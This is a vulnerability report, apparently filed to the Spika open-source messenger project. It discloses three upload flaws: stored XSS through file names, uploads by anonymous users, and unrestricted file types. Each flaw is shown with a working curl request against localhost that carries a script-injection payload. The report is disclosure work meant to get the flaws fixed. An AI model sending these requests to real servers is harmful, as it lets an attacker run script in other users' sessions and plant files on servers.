Multiple vulnerabilities in upload function (Stored-XSS, Upload Without Authen, Unrestricted Upload of File) on Web Application Version #76
Description
Hi Spika,
I found some multiple vulnerabilities via upload function on Web Application Version. Here are the details:
SUMMARY
Exploit Title: Spika - Multipurpose Opensource Messenger - Multiple vulnerabilities in upload function
Dork: N/A
Date: 10/11/2017
Vendor : http://spikaapp.com/
Software: http://spikaapp.com/; https://github.com/cloverstudio/Spika
Demo: N/A
Affected version: the lastest version
Author: Btis Team
VULNER 1 - Stored XSS
Description
Upload file function is in chat room does not validate the file name. So that, the attacker can inject XSS payload
Payload will be triggered when the response of loading message api returns
Exploit
Payload: <script>alert('test')</script>
curl -i -s -k -X 'POST'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' -H 'access-token: w47OMKY7PKXqYhKhWEoInfUk' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/spika/' -H 'Content-Type: multipart/form-data; boundary=---------------------------216352219610'
-b 'io=2MpySFezOj_Wxvx_AAAD; cookie_logininfo={%22id%22:%223%22%2C%22name%22:%22test%22%2C%22avatarURL%22:%22%22%2C%22roomID%22:%223%22}'
--data-binary $'-----------------------------216352219610\x0d\x0aContent-Disposition: form-data; name="file"; filename="<script>alert('test')</script>"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------216352219610--\x0d\x0a'
'http://localhost/spika/v1/file/upload'
VULNER 2 - Upload File into the Web Server by Anonymous User
Description
Upload file function is in chat room does check cookies or access-token. So that, the attacker can upload file into server by Anonymous user
Exploit
Payload:
curl -i -s -k -X 'POST'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/spika/' -H 'Content-Type: multipart/form-data; boundary=---------------------------216352219610'
--data-binary $'-----------------------------216352219610\x0d\x0aContent-Disposition: form-data; name="file"; filename="JPG.jpg.txt"\x0d\x0aContent-Type: text/plain\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------216352219610--\x0d\x0a'
'http://localhost/spika/v1/file/upload'
VULNER 3 - Unrestricted Upload of File
Description
Upload file function fails in checking file extension. So that, the attacker can upload malware into server. Beside, file uploaded can be downloaded without authentication that make the vulnerability is more dangerous.
Exploit
Payload:
curl -i -s -k -X 'POST'
-H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/spika/' -H 'Content-Type: multipart/form-data; boundary=---------------------------216352219610'
--data-binary $'-----------------------------216352219610\x0d\x0aContent-Disposition: form-data; name="file"; filename="JPG.jpg.html"\x0d\x0aContent-Type: text/html\x0d\x0a\x0d\x0a<script>alert('test')</script>\x0d\x0a-----------------------------216352219610--\x0d\x0a'
'http://localhost/spika/v1/file/upload'
Feel free to ask me more information
Regards,